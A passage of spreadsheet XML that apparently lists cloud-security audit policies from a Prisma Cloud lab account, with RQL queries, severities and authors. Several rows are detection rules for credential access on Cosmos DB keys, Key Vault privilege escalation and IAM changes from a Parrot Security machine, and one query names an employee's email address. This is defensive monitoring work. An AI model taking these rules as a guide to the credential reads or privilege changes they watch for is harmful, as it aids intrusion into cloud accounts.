      <c r="X2640" t="inlineStr">
        <is>
          <t>Disable permissions for such user</t>
        </is>
      </c>
      <c r="Y2640" t="inlineStr"/>
      <c r="Z2640" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.account = 'twistlock-cto-lab' AND cloud.service = 'compute.googleapis.com' AND subject = 'jmontufar@paloaltonetworks.com' AND operation IN ( 'v1.compute.instances.reset' , 'v1.compute.instances.start', 'v1.compute.instances.stop' )</t>
        </is>
      </c>
      <c r="AA2640" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2640" t="inlineStr">
        <is>
          <t>2024-09-13 16:50:07</t>
        </is>
      </c>
      <c r="AC2640" t="inlineStr"/>
      <c r="AD2640" t="b">
        <v>0</v>
      </c>
      <c r="AE2640" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2640" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>e5dd475b-91a4-4920-aa27-ce330ab717c2</t>
        </is>
      </c>
      <c r="AI2640" t="inlineStr">
        <is>
          <t>028e6568-2fa7-4dde-afa3-fe83e9e0e43c</t>
        </is>
      </c>
      <c r="AJ2640" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2640" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2641">
      <c r="A2641" t="inlineStr"/>
      <c r="B2641" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2641" s="2" t="inlineStr"/>
      <c r="D2641" t="inlineStr"/>
      <c r="E2641" t="inlineStr"/>
      <c r="F2641" t="inlineStr"/>
      <c r="G2641" t="b">
        <v>0</v>
      </c>
      <c r="H26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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J2641" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2641" t="inlineStr">
        <is>
          <t>aduit_search_policy_migrate</t>
        </is>
      </c>
      <c r="L2641" t="inlineStr"/>
      <c r="M2641" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2641" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2641" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2641" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2641" t="inlineStr"/>
      <c r="R2641" t="inlineStr"/>
      <c r="S2641" t="inlineStr"/>
      <c r="T2641" t="b">
        <v>0</v>
      </c>
      <c r="U2641" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2641" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2641" t="inlineStr"/>
      <c r="X2641" t="inlineStr"/>
      <c r="Y2641" t="inlineStr"/>
      <c r="Z2641" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.account != 'string'</t>
        </is>
      </c>
      <c r="AA2641" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2641" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:23</t>
        </is>
      </c>
      <c r="AC2641" t="inlineStr"/>
      <c r="AD2641" t="b">
        <v>0</v>
      </c>
      <c r="AE2641" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2641" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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1" t="inlineStr">
        <is>
          <t>0c10644d-f92e-4834-acb3-55b2765f85ba</t>
        </is>
      </c>
      <c r="AI2641" t="inlineStr">
        <is>
          <t>7ff43f73-7bba-421e-a82d-83cdf32edc50</t>
        </is>
      </c>
      <c r="AJ2641" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2641" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2642">
      <c r="A2642" t="inlineStr"/>
      <c r="B2642" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2642" s="2" t="inlineStr"/>
      <c r="D2642" t="inlineStr"/>
      <c r="E2642" t="inlineStr"/>
      <c r="F2642" t="inlineStr"/>
      <c r="G2642" t="b">
        <v>0</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2642" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2642" t="inlineStr">
        <is>
          <t>APD_CosmosMasterKeyAccessed</t>
        </is>
      </c>
      <c r="L2642" t="inlineStr"/>
      <c r="M2642" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2642" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2642" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2642" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2642" t="inlineStr"/>
      <c r="R2642" t="inlineStr"/>
      <c r="S2642" t="inlineStr">
        <is>
          <t>Credential Access,Cosmos DB</t>
        </is>
      </c>
      <c r="T2642" t="b">
        <v>0</v>
      </c>
      <c r="U2642" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2642" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2642" t="inlineStr"/>
      <c r="X2642" t="inlineStr"/>
      <c r="Y2642" t="inlineStr"/>
      <c r="Z2642" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'azure' AND operation = 'Read database account readonly keys (EndRequest)'</t>
        </is>
      </c>
      <c r="AA2642" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2642" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:40</t>
        </is>
      </c>
      <c r="AC2642" t="inlineStr"/>
      <c r="AD2642" t="b">
        <v>0</v>
      </c>
      <c r="AE2642" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2642" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>0908f221-4e17-4ed6-a21f-259e05d62cbe</t>
        </is>
      </c>
      <c r="AI2642" t="inlineStr">
        <is>
          <t>af60323f-89b9-4057-9983-dcef1c397769</t>
        </is>
      </c>
      <c r="AJ2642" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2642" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2643">
      <c r="A2643" t="inlineStr"/>
      <c r="B2643" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2643" s="2" t="inlineStr"/>
      <c r="D2643" t="inlineStr"/>
      <c r="E2643" t="inlineStr"/>
      <c r="F2643" t="inlineStr"/>
      <c r="G2643" t="b">
        <v>0</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2643" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2643" t="inlineStr">
        <is>
          <t>APD_KeyVaultAccessPolicyModifiedRuntime</t>
        </is>
      </c>
      <c r="L2643" t="inlineStr"/>
      <c r="M2643" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2643" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2643" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2643" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2643" t="inlineStr"/>
      <c r="R2643" t="inlineStr"/>
      <c r="S2643" t="inlineStr">
        <is>
          <t>Privilege Escalation,Key Vault</t>
        </is>
      </c>
      <c r="T2643" t="b">
        <v>0</v>
      </c>
      <c r="U2643" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2643" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2643" t="inlineStr"/>
      <c r="X2643" t="inlineStr"/>
      <c r="Y2643" t="inlineStr"/>
      <c r="Z2643" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'azure' AND operation = 'Update Key Vault (EndRequest)'</t>
        </is>
      </c>
      <c r="AA2643" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2643" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:04</t>
        </is>
      </c>
      <c r="AC2643" t="inlineStr"/>
      <c r="AD2643" t="b">
        <v>0</v>
      </c>
      <c r="AE2643" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2643" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>ded7182a-dc61-4ce7-b675-901e97d5d554</t>
        </is>
      </c>
      <c r="AI2643" t="inlineStr">
        <is>
          <t>79986341-d4ff-4e5b-ad57-2baf1b27b159</t>
        </is>
      </c>
      <c r="AJ2643" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2643" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2644">
      <c r="A2644" t="inlineStr"/>
      <c r="B2644" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2644" s="2" t="inlineStr"/>
      <c r="D2644" t="inlineStr"/>
      <c r="E2644" t="inlineStr"/>
      <c r="F2644" t="inlineStr"/>
      <c r="G2644" t="b">
        <v>0</v>
      </c>
      <c r="H26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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2644" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2644" t="inlineStr">
        <is>
          <t>Test event region exclude policy</t>
        </is>
      </c>
      <c r="L2644" t="inlineStr"/>
      <c r="M2644" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2644" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2644" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2644" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2644" t="inlineStr"/>
      <c r="R2644" t="inlineStr"/>
      <c r="S2644" t="inlineStr"/>
      <c r="T2644" t="b">
        <v>0</v>
      </c>
      <c r="U2644" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2644" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2644" t="inlineStr"/>
      <c r="X2644" t="inlineStr"/>
      <c r="Y2644" t="inlineStr"/>
      <c r="Z2644" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws'</t>
        </is>
      </c>
      <c r="AA2644" t="inlineStr">
        <is>
          <t>Muhammad Rehan</t>
        </is>
      </c>
      <c r="AB2644" t="inlineStr">
        <is>
          <t>2024-09-13 16:38:03</t>
        </is>
      </c>
      <c r="AC2644" t="inlineStr"/>
      <c r="AD2644" t="b">
        <v>0</v>
      </c>
      <c r="AE2644" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2644" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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4" t="inlineStr">
        <is>
          <t>9b35f41a-6c58-429b-9925-3430b80b0cb8</t>
        </is>
      </c>
      <c r="AI2644" t="inlineStr">
        <is>
          <t>10bbb73e-b4ec-45cc-b7a2-14efd35f2b6a</t>
        </is>
      </c>
      <c r="AJ2644" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2644" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2645">
      <c r="A2645" t="inlineStr"/>
      <c r="B2645" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2645" s="2" t="inlineStr"/>
      <c r="D2645" t="inlineStr"/>
      <c r="E2645" t="inlineStr"/>
      <c r="F2645" t="inlineStr"/>
      <c r="G2645" t="b">
        <v>0</v>
      </c>
      <c r="H26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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2645" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2645" t="inlineStr">
        <is>
          <t>Modify Instance</t>
        </is>
      </c>
      <c r="L2645" t="inlineStr"/>
      <c r="M2645" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2645" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2645" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2645" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2645" t="inlineStr"/>
      <c r="R2645" t="inlineStr"/>
      <c r="S2645" t="inlineStr"/>
      <c r="T2645" t="b">
        <v>0</v>
      </c>
      <c r="U2645" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2645" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2645" t="inlineStr"/>
      <c r="X2645" t="inlineStr"/>
      <c r="Y2645" t="inlineStr"/>
      <c r="Z2645" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws' AND cloud.service IN ( 'ec2.amazonaws.com' ) AND operation IN ( 'ModifyInstanceAttribute' ) AND json.rule = $.requestParameters.disableApiStop.value = 'false'</t>
        </is>
      </c>
      <c r="AA2645" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2645" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:21</t>
        </is>
      </c>
      <c r="AC2645" t="inlineStr"/>
      <c r="AD2645" t="b">
        <v>0</v>
      </c>
      <c r="AE2645" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2645" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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5" t="inlineStr">
        <is>
          <t>8d580a2b-115f-4a49-a43e-4f00e9cff42c</t>
        </is>
      </c>
      <c r="AI2645" t="inlineStr">
        <is>
          <t>6204b5cc-62de-4df1-8ced-4ed8fd247cb2</t>
        </is>
      </c>
      <c r="AJ2645" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2645" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2646">
      <c r="A2646" t="inlineStr"/>
      <c r="B2646" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2646" s="2" t="inlineStr"/>
      <c r="D2646" t="inlineStr"/>
      <c r="E2646" t="inlineStr"/>
      <c r="F2646" t="inlineStr"/>
      <c r="G2646" t="b">
        <v>0</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2646" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2646" t="inlineStr">
        <is>
          <t>test_mbv502</t>
        </is>
      </c>
      <c r="L2646" t="inlineStr"/>
      <c r="M2646" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2646" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2646" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2646" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2646" t="inlineStr"/>
      <c r="R2646" t="inlineStr"/>
      <c r="S2646" t="inlineStr"/>
      <c r="T2646" t="b">
        <v>0</v>
      </c>
      <c r="U2646" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2646" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2646" t="inlineStr"/>
      <c r="X2646" t="inlineStr"/>
      <c r="Y2646" t="inlineStr"/>
      <c r="Z2646" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws' AND cloud.service = 's3.amazonaws.com' AND operation = 'PutBucketPolicy'</t>
        </is>
      </c>
      <c r="AA2646" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2646" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:02</t>
        </is>
      </c>
      <c r="AC2646" t="inlineStr"/>
      <c r="AD2646" t="b">
        <v>0</v>
      </c>
      <c r="AE2646" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2646" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>90028f91-e830-4329-8f80-2a36f6ce701f</t>
        </is>
      </c>
      <c r="AI2646" t="inlineStr">
        <is>
          <t>61b98192-9a4f-49e3-a75b-e677004e83af</t>
        </is>
      </c>
      <c r="AJ2646" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2646" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2647">
      <c r="A2647" t="inlineStr"/>
      <c r="B2647" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2647" s="2" t="inlineStr"/>
      <c r="D2647" t="inlineStr"/>
      <c r="E2647" t="inlineStr"/>
      <c r="F2647" t="inlineStr"/>
      <c r="G2647" t="b">
        <v>0</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2647" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2647" t="inlineStr">
        <is>
          <t>mbv-s3-buck</t>
        </is>
      </c>
      <c r="L2647" t="inlineStr"/>
      <c r="M2647" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2647" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2647" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2647" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2647" t="inlineStr"/>
      <c r="R2647" t="inlineStr"/>
      <c r="S2647" t="inlineStr"/>
      <c r="T2647" t="b">
        <v>0</v>
      </c>
      <c r="U2647" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2647" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2647" t="inlineStr"/>
      <c r="X2647" t="inlineStr"/>
      <c r="Y2647" t="inlineStr"/>
      <c r="Z2647" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws' AND cloud.service = 's3.amazonaws.com' AND operation = 'PutBucketPolicy'</t>
        </is>
      </c>
      <c r="AA2647" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2647" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:37</t>
        </is>
      </c>
      <c r="AC2647" t="inlineStr"/>
      <c r="AD2647" t="b">
        <v>0</v>
      </c>
      <c r="AE2647" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2647" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>19c7fa80-aeb8-491b-939a-302989420384</t>
        </is>
      </c>
      <c r="AI2647" t="inlineStr">
        <is>
          <t>1c3a8ab6-9187-4e1c-86c9-30af4742047d</t>
        </is>
      </c>
      <c r="AJ2647" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2647" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2648">
      <c r="A2648" t="inlineStr"/>
      <c r="B2648" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2648" s="2" t="inlineStr"/>
      <c r="D2648" t="inlineStr"/>
      <c r="E2648" t="inlineStr"/>
      <c r="F2648" t="inlineStr"/>
      <c r="G2648" t="b">
        <v>0</v>
      </c>
      <c r="H26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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2648" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2648" t="inlineStr">
        <is>
          <t>test-mbv-600</t>
        </is>
      </c>
      <c r="L2648" t="inlineStr"/>
      <c r="M2648" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2648" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2648" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2648" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2648" t="inlineStr"/>
      <c r="R2648" t="inlineStr"/>
      <c r="S2648" t="inlineStr"/>
      <c r="T2648" t="b">
        <v>0</v>
      </c>
      <c r="U2648" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2648" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2648" t="inlineStr"/>
      <c r="X2648" t="inlineStr"/>
      <c r="Y2648" t="inlineStr"/>
      <c r="Z2648" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws' AND cloud.service = 's3.amazonaws.com' AND operation = 'PutBucketPolicy'</t>
        </is>
      </c>
      <c r="AA2648" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2648" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:56</t>
        </is>
      </c>
      <c r="AC2648" t="inlineStr"/>
      <c r="AD2648" t="b">
        <v>0</v>
      </c>
      <c r="AE2648" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2648" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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8" t="inlineStr">
        <is>
          <t>d2a038a4-8fc6-4548-a6a9-9604578a4298</t>
        </is>
      </c>
      <c r="AI2648" t="inlineStr">
        <is>
          <t>2c5ad433-cc86-43c6-ac7c-92bfdece2d85</t>
        </is>
      </c>
      <c r="AJ2648" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2648" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2649">
      <c r="A2649" t="inlineStr"/>
      <c r="B2649" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2649" s="2" t="inlineStr"/>
      <c r="D2649" t="inlineStr"/>
      <c r="E2649" t="inlineStr"/>
      <c r="F2649" t="inlineStr"/>
      <c r="G2649" t="b">
        <v>0</v>
      </c>
      <c r="H26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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2649" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2649" t="inlineStr">
        <is>
          <t>testdeletion05sep23</t>
        </is>
      </c>
      <c r="L2649" t="inlineStr"/>
      <c r="M2649" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2649" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2649" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2649" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2649" t="inlineStr"/>
      <c r="R2649" t="inlineStr"/>
      <c r="S2649" t="inlineStr"/>
      <c r="T2649" t="b">
        <v>0</v>
      </c>
      <c r="U2649" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2649" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2649" t="inlineStr"/>
      <c r="X2649" t="inlineStr"/>
      <c r="Y2649" t="inlineStr"/>
      <c r="Z2649" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws' AND cloud.service = 's3.amazonaws.com' AND operation IN ( 'DeleteBucket' )</t>
        </is>
      </c>
      <c r="AA2649" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2649" t="inlineStr">
        <is>
          <t>2024-09-13 17:17:27</t>
        </is>
      </c>
      <c r="AC2649" t="inlineStr"/>
      <c r="AD2649" t="b">
        <v>0</v>
      </c>
      <c r="AE2649" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2649" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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49" t="inlineStr">
        <is>
          <t>80376966-835c-48db-972a-8973554011c5</t>
        </is>
      </c>
      <c r="AI2649" t="inlineStr">
        <is>
          <t>fdae31b6-1448-4669-b3fa-7423b83ebdf0</t>
        </is>
      </c>
      <c r="AJ2649" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2649" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2650">
      <c r="A2650" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2650" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2650" s="2" t="inlineStr"/>
      <c r="D2650" t="inlineStr"/>
      <c r="E2650" t="inlineStr"/>
      <c r="F2650" t="inlineStr"/>
      <c r="G2650" t="b">
        <v>1</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2650" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K2650" t="inlineStr">
        <is>
          <t>AWS IAM configuration updates invoked from Parrot Security Linux machine</t>
        </is>
      </c>
      <c r="L2650" t="inlineStr"/>
      <c r="M2650" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2650" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2650" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P2650" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q2650" t="inlineStr">
        <is>
          <t>3.1 Audit</t>
        </is>
      </c>
      <c r="R2650" t="inlineStr">
        <is>
          <t>3.1.1 Audit - All</t>
        </is>
      </c>
      <c r="S2650" t="inlineStr"/>
      <c r="T2650" t="b">
        <v>0</v>
      </c>
      <c r="U2650" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V2650" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W2650" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM configuration updates invoked from the Parrot Linux machine. IAM Configuration changes such as creating, deleting users/groups, or modifying policies are triggered from Parrot Linux by IAM API calls using credentials that belong to your AWS account. Parrot Security Linux is a popular penetration testing tool that security professionals use to identify weaknesses in unpatched instances. Attackers might use this tool to find configuration weaknesses and gain unauthorized access to your AWS environment.</t>
        </is>
      </c>
      <c r="X2650"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0" t="inlineStr"/>
      <c r="Z2650" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.service = 'iam.amazonaws.com' AND json.rule = $.userAgent contains 'parrot'</t>
        </is>
      </c>
      <c r="AA2650" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2650" t="inlineStr">
        <is>
          <t>2023-07-20 17:50:45</t>
        </is>
      </c>
      <c r="AC2650" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-687</t>
        </is>
      </c>
      <c r="AD2650" t="b">
        <v>1</v>
      </c>
      <c r="AE2650" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2650" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>1398b0d2-f635-4400-b4f4-801c2e6413dd</t>
        </is>
      </c>
      <c r="AI2650" t="inlineStr">
        <is>
          <t>3cac99e1-1904-4983-84a7-a2a2107cffe1</t>
        </is>
      </c>
      <c r="AJ2650" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2650" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2651">
      <c r="A2651" t="inlineStr">
        <is>
